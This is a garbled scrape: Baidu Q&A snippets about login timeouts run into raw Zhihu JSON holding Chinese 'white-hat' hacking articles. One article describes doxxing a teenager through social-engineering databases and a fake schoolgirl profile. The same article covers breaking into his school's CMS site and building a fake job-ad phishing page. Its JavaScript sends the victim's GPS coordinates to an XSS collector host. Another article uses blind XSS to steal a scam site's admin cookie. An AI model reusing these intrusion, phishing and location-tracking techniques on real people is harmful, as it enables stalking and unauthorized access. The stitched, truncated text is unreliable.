我安智电脑登录器市场的账号一直登录不上,说是连接超时,可是我的网络绝对没有问题,其它的都能正常使用,而且我也

我的手机锁定了,登录flyme帐号,显示网络连接超时请稍候再试!_百度知道
我的手机锁定了,登录flyme帐号,显示网络连接超时请稍候再试!
我的手机锁定了,登录flyme帐号,显示网络连接超时请稍候再试!
我用家里的电脑登录网站,flyme帐号正常,切换多个网络都不行,其他手机都正常,魅族的服务器行不行啊!
你把手机锁定了,让我怎么用。
电话客服说服务器问题的话处理不了!!!那要你的这...
我有更好的答案
也可以用数据上网。如果连上的WiFi不能使用的(和宽带运营商有关),您就到没有WiFi的地方.com/" title="Flyme&&云服务&gt,它会自动使用数据上网的.com/" target="_blank">魅族官方网站&gt。不确定是否联网的,您在<a href="http,长按电源键7秒强制重启,只能在手机联网的时候操作的。输入密码要使用系统自带输入法,否则会出错。还有一种解锁方法,手机会再次主动联网,可以用WLAN://www.&&gt://www,这也是在手机联网的时候自动接收指令您好,手机锁定的;点“远程退出”.meizu
因梦想而立,因热爱而极致;
主营:知名智能手机厂商
为您推荐:
其他类似问题
网络连接超时的相关知识
&#xe675;换一换
回答问题,赢新手礼包&#xe6b9;
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。为什么淘宝帐号登陆不上;总是显示网络连接超时_百度知道
为什么淘宝帐号登陆不上;总是显示网络连接超时
我有更好的答案
网络有问题重新连接
新疆的个别地方也是这么个情况
因为这边网络管制呢,淘宝上不了,好像只仅限和田,喀什,莎车。克州都可以上
其他1条回答
为您推荐:
其他类似问题
网络连接超时的相关知识
&#xe675;换一换
回答问题,赢新手礼包&#xe6b9;
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。我的网络有,微信和别的都可以打开,就是qq登陆不上,显示网络没有连接,_百度知道
我的网络有,微信和别的都可以打开,就是qq登陆不上,显示网络没有连接,
我的网络有,微信和别的都可以打开,就是qq登陆不上,显示网络没有连接,用账号登陆显示连接超时
我有更好的答案
然后单击下一步1、找到网络图标。2,然后点击该连接方式。3,选择第一个“设置新的网络连接”,然后击右键,输入ISP服务商提供的用户名和密码、在打开的界面中,即可成功建立宽带连接。5、接下来,单击桌面系统托盘图标里的网络图标、在打开的界面中、接下来,选择“PPPoE连接方式”,选择“设置新的连接和网络”。4,选择“打开网络和共享中心”
采纳率:92%
来自团队:
清楚QQ缓存从新登或删掉重新下载
为您推荐:
其他类似问题
qq登陆的相关知识
&#xe675;换一换
回答问题,赢新手礼包&#xe6b9;
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。i春秋技术社区i春秋技术社区网络如此多娇,引无数黑客竞折腰关注专栏坏蛋 的文章{&debug&:false,&apiRoot&:&&,&paySDK&:&https:\u002F\u002Fpay.zhihu.com\u002Fapi\u002Fjs&,&wechatConfigAPI&:&\u002Fapi\u002Fwechat\u002Fjssdkconfig&,&name&:&production&,&instance&:&column&,&tokens&:{&X-XSRF-TOKEN&:null,&X-UDID&:null,&Authorization&:&oauth c3cef7c66aa9e6a1e3160e20&}}{&database&:{&Post&:{&&:{&title&:&白帽子的反击,一次社工智障锁机病毒er&,&author&:&yin-chang-ni&,&content&:&\u003Cblockquote\u003E本文原创作者:onls辜釉\u003Cbr\u003E内容来源:\u003Ca href=\&http:\u002F\u002Flink.zhihu.com\u002F?target=http%3A\u002F\u002Fbbs.ichunqiu.com\u002Fportal.php%3Ffrom%3Dzhihu\&\u003Ei春秋社区\u003C\u002Fa\u003E\u003Cbr\u003E未经许可禁止转载\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E起因\u003C\u002Fb\u003E:这天刚下班,收到我弟信息,大致内容是这样的:哥哥,完蛋了,我好像被\u003Cu\u003E\u003Ca href=\&http:\u002F\u002Fbbs.ichunqiu.com\u002Fforum-41-1.html\&\u003E黑客攻击\u003C\u002Fa\u003E\u003C\u002Fu\u003E了怎么办? (要知道他小学2年级..日常就是混迹各种QQ游戏)
我的内心OS是这样的:WTF?\u003C\u002Fp\u003E\u003Cp\u003E你特么在逗我?谁家的黑客这么闲..而且应该还没到看岛国片中毒的年纪吧.. \u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E随后他发来这张照片\u003C\u002Fb\u003E:\u003C\u002Fp\u003E\u003Cimg src=\&v2-7e9e6c3ebe424bbcc71c.png\& data-rawwidth=\&750\& data-rawheight=\&423\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E看到这..我好像明白了什么..正好那天上午在i春秋群里刚看到一篇报道“国产勒索病毒”来袭的文章,文章一下子翻不到了,大概就是国产化后,界面上提示请联系XXXQQ转账XX人名币。虽然我看到的文章里病毒界面不是这样的(这个界面是真的LOW,黑客看了会沉默,小学生看了会流泪),但我本能的觉得是变体。我问我弟打开了什么文件,他说他正在打游戏,有人QQ嘀了他一下,发了个东西他就点开了..然后就这样了..想问他能不能找到那个文件发给我..不过好像是对牛弹琴..
由于当时正好在下班回去路上,手头没电脑,先求助了\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fhome.php?mod=space&uid=70750\&\u003E@space\u003C\u002Fa\u003E\u003C\u002Fu\u003E (论坛ID不知道对不对,逃...),他给出了一些建议并答应稍后帮我看看,(最有建设性的建议还是把我弟打一顿),在此先感谢一波。
笑点来了..开头为什么说是“智障锁机病毒”,因为当我还试图跟我弟沟通时,他没回了..一阵时间之后,我打了个电话过去家里,“怎么不回我信息,电脑怎么样了?”“我在玩游戏了,360弹出个一键清除恶意软件,我点击了一下就没了,这应该是好了吧..”...玛德智障.. 感情是个蹩脚玩意 ..
中毒的事算是告一段落了,但是作为爱搞事的大\u003Cb\u003E秦国\u003C\u002Fb\u003E帅哥(真的帅,每次照镜子都被自己帅哭),怎么能就这样完了呢。果断申请加了病毒上的那个QQ号(听说最近流行社工?),晚上好友申请通过,(中间还有个插曲,我google了一下这个QQ,\u003C\u002Fp\u003E\u003Cp\u003E.\u003C\u002Fp\u003E\u003Cimg src=\&v2-8076dfcf525bede9a264e6f1e76040dc.png\& data-rawwidth=\&750\& data-rawheight=\&354\&\u003E\u003Cp\u003E直接搜到了锁机密码:QQ:
密码:asd1230.),添加好友后,他主动发信息来问我有何贵干?我说来问锁机密码。他让我把软件发给他看一下,好像还有点警惕性?我回了句密码asd1230. 菜逼你锁都被解了我去哪给你发!被鄙视后他急了,说要给我发一个究极病毒,修电脑的都不能解开!(这是修电脑被黑得最惨的一次): \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-6620aef8aa3a566e579a5850caf191bb.png\& data-rawwidth=\&614\& data-rawheight=\&2112\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-f34d111c7bd713ae0cd3bb3.png\& data-rawwidth=\&750\& data-rawheight=\&1334\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-530eadae.png\& data-rawwidth=\&299\& data-rawheight=\&516\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E下面开始分析:
1. QQ等级比较高,有可能是大号,资料年龄显示16,从刚才的对话来看,语言还很稚嫩,确实有可能。
2. 随后我把QQ号拿去社工库里跑了一波,什么信息都没有(尴尬),QQ空间860多条说说,一条一条翻,找到一条说“失恋了,从此不上QQ,有事打:
183xxxx0232”,百度一下归属地为:广东揭阳。
3. 然后利用支付宝转账想看姓名,但是发现未实名,这里更加判断是未成年,然后空间里还有一条有定位的动态,地址为:揭阳xx中学,判断他可能就是这个学校的学生,之后各种社工库搜索一番下来毫无收获,这些信息根本不够,看来还是得从他本身入手。
4.拿小号,修改性别为女,地址填:广东揭阳;学校填:揭阳xx中学;在相册里传了两张女学生照片。都弄好之后尝试加他(他现在已经改网名了,空间也不让访问,下面的图是刚截的所以和之前的不太一样): \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-28a114db83c09a7911b6.png\& data-rawwidth=\&682\& data-rawheight=\&903\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-df44a38a0ddc16.png\& data-rawwidth=\&678\& data-rawheight=\&949\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-74adbf16ae9af.png\& data-rawwidth=\&674\& data-rawheight=\&934\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-ee12acf3fbbb.png\& data-rawwidth=\&652\& data-rawheight=\&942\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-88d00a5e9c22bcaf2e554e6f83f3e0e8.png\& data-rawwidth=\&650\& data-rawheight=\&927\&\u003E\u003Cp\u003E我真是边撩边笑...咳咳。这里已经能确定他就是xx中学的学生了,名字也知道了,谷歌hack语法搜了下名字,搜出一份在揭阳赶集网上投的找发传单工作的简历,手机号能对上,应该也还在使用,\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-d03d93c702bca03f06b5f4a785f350d6.png\& data-rawwidth=\&663\& data-rawheight=\&919\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E我靠,这里差点露馅,看来他认为我是初一刚来学校的小学妹,他大概是今年刚初3毕业,所以他觉得我和他都还不知道分班情况。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-3d7c260bd81f2c6ab33de0db929a4e73.png\& data-rawwidth=\&638\& data-rawheight=\&922\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-7fdecb5e39d86203af72cfb.png\& data-rawwidth=\&580\& data-rawheight=\&890\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-d3bf2fe07f2d6eb57ffbdbae96085b26.png\& data-rawwidth=\&605\& data-rawheight=\&922\&\u003E\u003Cp\u003E..暖男啊,还教我少买书,后来还想撩我..但是对于这个人的基本轮廓已经被勾勒出来,就不跟他扯淡了,不然我怕我会吐出来..
这是现在得到的信息: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-4afa90afbaf2d.png\& data-rawwidth=\&272\& data-rawheight=\&158\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E然后我搜了下那个中学的官网: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-15baaa4fe3e1c4a9a6aa90468cba4592.png\& data-rawwidth=\&750\& data-rawheight=\&362\&\u003E\u003Cp\u003ECMS指纹识别为dedecms,查看一下版本: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-0be82aef1bd671fcf3bfd.png\& data-rawwidth=\&680\& data-rawheight=\&302\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E哈哈哈,接下来是\u003Cu\u003E\u003Ca href=\&http:\u002F\u002Fbbs.ichunqiu.com\u002Fforum-41-1.html\&\u003E白帽\u003C\u002Fa\u003E\u003C\u002Fu\u003E子ShowTime,Duang~: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-0d1d643bcb5ac319d102.png\& data-rawwidth=\&750\& data-rawheight=\&377\&\u003E\u003Cp\u003E提权什么的就不考虑了,我的目的不在于此,能得到后台发布权限就行了,我本来打算直接发一篇通报批评(当然我会秒删,只是截图吓他),再利用钓鱼定位技术获取他的位置信息,就跟他说是调查机构卫星定位啥的..怀疑他涉嫌网络传播病毒,这估计得吓尿。
发布权限已经获取了,现在要获取他的位置信息,此处参考了\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fhome.php?mod=space&uid=146760\&\u003E@风在指尖\u003C\u002Fa\u003E\u003C\u002Fu\u003E
的这篇文章:\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=hot5\&\u003Ehttps:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=hot5\u003C\u002Fa\u003E\u003C\u002Fu\u003E 他的打包钓鱼代码没有魔法币,我是下不起了,就测试了下他的公开代码,前后端,都传到了自己的服务器上,发现在我三星手机的自带浏览器里并不会弹出询问是否允许获取位置信息,QQ里开打也不会,苹果我也试了,都一样,但是我用火狐、QQ浏览器、微信直接打开都可以正常弹出询问,给权限后能正确弹出经纬度(我测试很精确,已经精确到我这栋办公楼了),具体原因我不清楚,而且@风在指尖 的那段后台保存TXT经纬度文件的代码,我测试也无法在服务器接收创建经纬度,已经给了777权限,我也不清楚什么原因(并且我在评论区看到也有人碰到一样的问题),而且他的前台代码自动提交表单之后,会跳转到后台地址,这样钓鱼肯定也是不行的,我觉得应该创建一个隐藏iframe,在里面创建表单提交或者直接AJAX提交比较好。在群里问了下,没人回,看来我这个帅(cai)逼也还是得靠自己。我对PHP不太了解,所以后台接受前台传来的数据我不知道该如何处理保存,只有转换思路了,我决定利用XSS平台来收信,将发送经纬度的js创建成一个xss项目,然后把代码放在我的前端文件里,这样可以直接在XSS项目里看到发送过来的经纬度。这样我的服务器上也不需要后端文件了(不会写),\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E
if (typeof(navigator.geolocation) == &#x27;undefined&#x27;) {\n\n
geol = google.gears.factory.create(&#x27;beta.geolocation&#x27;);\n\n
} else {\n\n
geol = navigator.\n\n
} catch (error) {\n\n
\u002F\u002Falert(error.message);\n\n
if (geol) {\n\n
geol.getCurrentPosition(function(position) {\n\n\n\n
var nowLatitude = position.coords.
var nowLongitude = position.coords.
\u002F\u002F以上是固定代码,获取经度纬度\n\n
var newimg = new Image(); \n\n
newimg.src=\&http:\u002F\u002F你的XSS平台地址\u002Findex.php?do=api&id=平台项目ID&weidu=\&+nowLatitude+\&&jingdu=\&+nowL\n\n\n\n
}, function(error) {\n\n
switch(error.code){\n\n
case error.TIMEOUT :\n\n
\u002F\u002Falert(\&连接超时,请重试\&);\n\\n\n
case error.PERMISSION_DENIED :\n\n
\u002F\u002Falert(\&您拒绝了使用位置共享服务,查询已取消\&);\n\\n\n
case error.POSITION_UNAVAILABLE :\n\n
\u002F\u002Falert(\&非常抱歉,我们暂时无法通过浏览器获取您的位置信息\&);\n\\n\n
}, {timeout:10000});
\u002F\u002F设置十秒超时\n\n\n\n\n\n
}\n\n\u002F\u002F设置连接超时的报错\u003C\u002Fcode\u003E\u003Cp\u003E自己,已经微信发给朋友安卓机测试了下都成功。 \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-00eccfa1e3b0c8.png\& data-rawwidth=\&750\& data-rawheight=\&650\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E前面已经提到他有在赶集投过找兼职的简历,所以这里我自己写成了一个伪装58同城揭阳的服务员招聘信息的钓鱼页,准备用那个小号发送这钓鱼给他,然后~嘿嘿嘿\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-7fa2e4c1b28d41bd6428fe.png\& data-rawwidth=\&750\& data-rawheight=\&1334\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-018e91771a8ecc1220937a.png\& data-rawwidth=\&750\& data-rawheight=\&1334\&\u003E\u003Cp\u003E但是,现在有一个最大的问题,这代码为啥在苹果手机上,无论是自带浏览器,还是QQ,微信打开都无法获取位置,只能在安卓上,可是,前面信息收集已经知道他使用的是iphone6。。所以,我并没有急着发给他,换句话说这其实是一次未完成的社工,但是走到这一步的时候,其实我已经对是否最后教育恐吓他不感兴趣了,他确实是一个小孩,也有善良的一面,那么干脆顺水推舟放过他,(我就是菜你能怎么样,rerere)。
欢迎大家加好友交流,我是丑逼ONLS辜釉,你呢。\u003C\u002Fp\u003E\u003Cp\u003E.\u003C\u002Fp\u003E\u003Cimg src=\&v2-7eec9f6942f41cbd0584.png\& data-rawwidth=\&750\& data-rawheight=\&454\&\u003E\u003Cp\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003C\u002Fp\u003E&,&updated&:new Date(&T10:00:30.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:48,&likeCount&:133,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T18:00:30+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-272a6969aee9bbd51ffcf75a_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:48,&likesCount&:133},&&:{&title&:&【XSS盲打网贷黑中介】-Onls聊安全之路见不平一顿骂&,&author&:&yin-chang-ni&,&content&:&\u003Cblockquote\u003E本文原创作者:onls辜釉\u003Cbr\u003E内容来源:\u003Ca href=\&http:\u002F\u002Flink.zhihu.com\u002F?target=http%3A\u002F\u002Fbbs.ichunqiu.com\u002Fportal.php%3Ffrom%3Dzhihu\&\u003Ei春秋社区\u003C\u002Fa\u003E\u003Cbr\u003E未经许可禁止转载\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E背景:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E楼主就职某第三方支付公司,对HTML、Javascript、C++、PHP、Java、Python等等都非常的不精通,找工作全靠颜值死撑,所以你们叫我帅(cai)逼就好了,不靠技术吃饭
hohoho~。 ps:我司也涉及了一些P2P网贷的业务,于是乎当我今天清理手机未读信息看到这样一条短信时: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-bb3fd731ea.png\& data-rawwidth=\&733\& data-rawheight=\&748\&\u003E\u003Cp\u003E出于求(xian)知(de)欲(dan)望(teng),我去搜了下这个网站: \u003C\u002Fp\u003E\u003Cimg src=\&v2-73adf9d61f580c4a55e60f4f60ec8f49.png\& data-rawwidth=\&750\& data-rawheight=\&378\&\u003E\u003Cp\u003E做得倒是有模有样,可是我特么并没有申请过借款啊,我这样子像是差钱的人吗!?像吗?!...好吧确实挺像的..
既然来都来了那就看看吧,在网站客服QQ空间看到这样的信息: \u003C\u002Fp\u003E\u003Cimg src=\&v2-9f68c9c9dc234d6decb80.png\& data-rawwidth=\&750\& data-rawheight=\&472\&\u003E\u003Cp\u003E我ri,这几家P2P都是我司的业务,他却打着校园易贷|网易助力的旗号到别家拿钱,(之前有出现过骗贷),不能忍(正义的\u003Cu\u003E\u003Ca href=\&http:\u002F\u002Fbbs.ichunqiu.com\u002Fforum-41-1.html\&\u003E白帽\u003C\u002Fa\u003E\u003C\u002Fu\u003E该出手了)。 \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-bd3e72cbcf31d22a207cc.png\& data-rawwidth=\&750\& data-rawheight=\&408\&\u003E\u003Cp\u003E先注册个帐号,打入敌军内部。(连手机验证码都不要,随便注册手机号,骗贷你也要走点心吧大兄弟)\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-0a3bc2ebe056d014eea197.png\& data-rawwidth=\&750\& data-rawheight=\&227\&\u003E\u003Cp\u003E噗!所有所有信息存放在第三方数据库,确保信息泄露...老哥稳,墙都不扶就服你。
像看到这样的玩意第一反应就是XSS了: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-2ffff4ea63cad80ba28c97a7abc9e7c0.png\& data-rawwidth=\&750\& data-rawheight=\&470\&\u003E\u003Cp\u003E槐蛋哥就是蛋总他哥的意思,..说错了,是蛋总是我表哥的意思。
在QQ邮箱这插入XSS平台地址(已经转换成短网址了),这只是截图,其实当时我基本每一项都插入了JS外链(瞎J*插,也不用管他输出在什么标签里。不然怎么叫盲打呢),插完提交成功。\u003C\u002Fp\u003E\u003Cimg src=\&v2-f77d5a8b0483887daaea.png\& data-rawwidth=\&452\& data-rawheight=\&670\&\u003E\u003Cp\u003E这里为了加快进度,添加客服好友,并且进行催促,让他早点看到我的资料。(截图是我后来其他号去加,还原聊天补的,他已经把我拉黑了。)\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-6dd0d903e79d56716a99a.png\& data-rawwidth=\&434\& data-rawheight=\&243\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-7ec2ccbc8.png\& data-rawwidth=\&750\& data-rawheight=\&323\&\u003E\u003Cp\u003E从他发的截图里可以看到后台结构,而且我填的资料显示正常,XSS代码很有可能已经执行了。到XSS平台看看: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-bfcb9e3f33ef.png\& data-rawwidth=\&594\& data-rawheight=\&187\&\u003E\u003Cp\u003E已经打到cookie了,后台地址:\u003Cu\u003E\u003Ca href=\&http:\u002F\u002Fwww.xxxxx.com\u002Faachulihhjjhdda\u002Fdingdan-chakan.php?username=xxx\&\u003Ehttp:\u002F\u002Fwww.xxxxx.com\u002Faachulihhjj ... an.php?username=xxx\u003C\u002Fa\u003E\u003C\u002Fu\u003E \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-599fa5fd0e51e.png\& data-rawwidth=\&750\& data-rawheight=\&378\&\u003E\u003Cp\u003E访问那个地址其实只能看到订单管理那一个页面,需要去掉后面的东西,直接访问http:\u002F\u002Fwww.xxxxx.com\u002Faachulihhjjhdda\u002F(这后台地址我也是服)
卧槽,里面太多信息了,包括学信网帐号密码、手持身份证、淘宝帐号密码、JD、等等等等、其实就连正规的P2P也不会要这么多信息,好可怕..果然是确保信息泄漏.. \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-3ca1c2561ffe4ddc4de7ceb3ce2b0666.png\& data-rawwidth=\&750\& data-rawheight=\&1000\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-c11cd9ff49bd5ccab4e4e60.png\& data-rawwidth=\&703\& data-rawheight=\&1209\&\u003E\u003Cp\u003E按表哥们的剧本,现在就应该是继续找洞提权拿服务器,删库、丢锁机病毒进去还世界和平了。
但,我是谁?i春秋号称最强嘴盾的Onls(自己吹的),啥本身没有,就爱扯皮逗乐,,提不了权那我就用“禁术”---急火攻心之术: \u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-4a9d78dec8c45275cce5cf7fc5644885.png\& data-rawwidth=\&259\& data-rawheight=\&204\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-d0e3c5efb7b0673fce28.png\& data-rawwidth=\&344\& data-rawheight=\&153\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-2d0c87a8bc1c7ee5cb866dcf3db209fd.png\& data-rawwidth=\&373\& data-rawheight=\&828\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-7288b4bcd55ce48e6e685d8a6775c00b.png\& data-rawwidth=\&380\& data-rawheight=\&1115\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-12672afba4c26db1b1da140bd7f0bd40.png\& data-rawwidth=\&260\& data-rawheight=\&870\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-51fad9de23e9efd3ed81b516dff56f25.png\& data-rawwidth=\&357\& data-rawheight=\&1054\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-8db697b4b6fd.png\& data-rawwidth=\&465\& data-rawheight=\&1100\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-aae6d969bc30ab5f3c36d75.png\& data-rawwidth=\&433\& data-rawheight=\&1099\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-dfbd3f0df3f9ac961aea7.png\& data-rawwidth=\&320\& data-rawheight=\&1047\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-f43e95cc26.png\& data-rawwidth=\&310\& data-rawheight=\&905\&\u003E\u003Cp\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003C\u002Fp\u003E&,&updated&:new Date(&T09:56:40.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:15,&likeCount&:23,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T17:56:40+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-e1cb1bce5130afa7edb80b_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:15,&likesCount&:23},&&:{&title&:&白帽黑客:我是如何用总裁座机给你打的电话!&,&author&:&yin-chang-ni&,&content&:&\u003Cblockquote\u003E作者:屌丝绅士\u003Cbr\u003E来源:\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fportal.php\&\u003Ei春秋社区\u003C\u002Fa\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cb\u003E0x00前言:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E
voip服务广泛用于企业内部对外的呼叫业务,现在三大运营商均提供虚拟号的业务,比如010-等等类似的号段,用于营销推广业务的使用,通过专用的设备针对内网的虚拟号进行汇总,并在服务器端解压拨号给手机端,优势在于 虚拟拨号业务可以容纳更多的电话号,而不是使用固定线缆的方式,进一步节省了企业的开销,\u003C\u002Fp\u003E\u003Cp\u003E 国内关于 voip服务的工具和使用基本上没有,因此 :\u003Cb\u003E本文属于i春秋原创为文章现金奖励计划,未经允许,严禁转载。\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x01背景:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E
想很多科幻大片都可以用“任意显”等软件直接拨打电话\u003Cb\u003E,\u003C\u002Fb\u003E你是不是也想那样牛逼呢,不过你也不用太高兴,很多东西不流行都是有原因的,比如我们这边文章关于voip的压力测试,voip这个服务很不常见而且也需要一些运营商才能提供的设备才能各大搭建出一些环境。但是 有幸的是,在某家公司上班的时候 恰好存在这种设备,而且存在相关漏洞,当时写的报告上交过,但并没有反馈,却被一句话鼓励掉了,想想现在要是没走,也能当个经理了,不过我不后悔。我还年轻,我还能拼!,咳咳 说多了,时隔半年,现在拿出这篇当初提交的漏洞作为案例也不为过,而且
全程不打马赛克,因为他是内网啊!哈哈\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x02起始:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E
万能的弱口令真的能搞穿内网,就像本篇文章,回想起来我发的文章目前为止都是一些简单的,大部分都是弱口令的那种,仿佛离开了弱口令,我就是一个菜鸡,时光荏苒,岁月流逝,不知不觉的长大了,\u003C\u002Fp\u003E\u003Cp\u003E
就像我起始说的那样,全程不打马赛克,因为是内网,打不打无所谓的,我简单的说下事情的开始吧,做公司网管,经常有同事说哪里的电话打不出去,哪里的电话不通,等等情况,每次都发现是语音网关出了问题,一重启就好,无论是抓包还是换网线都不行,后来开着nmap --script扫了一下,有一些语音网关开着80的端口,登陆上去之后 还需要账号和密码,那咋办,爆破吧,爆了一天一宿可没中\u003Cb\u003E,\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-ccca8b2cc4dcc657a8321.png\& data-rawwidth=\&1267\& data-rawheight=\&492\&\u003E\u003Cp\u003E
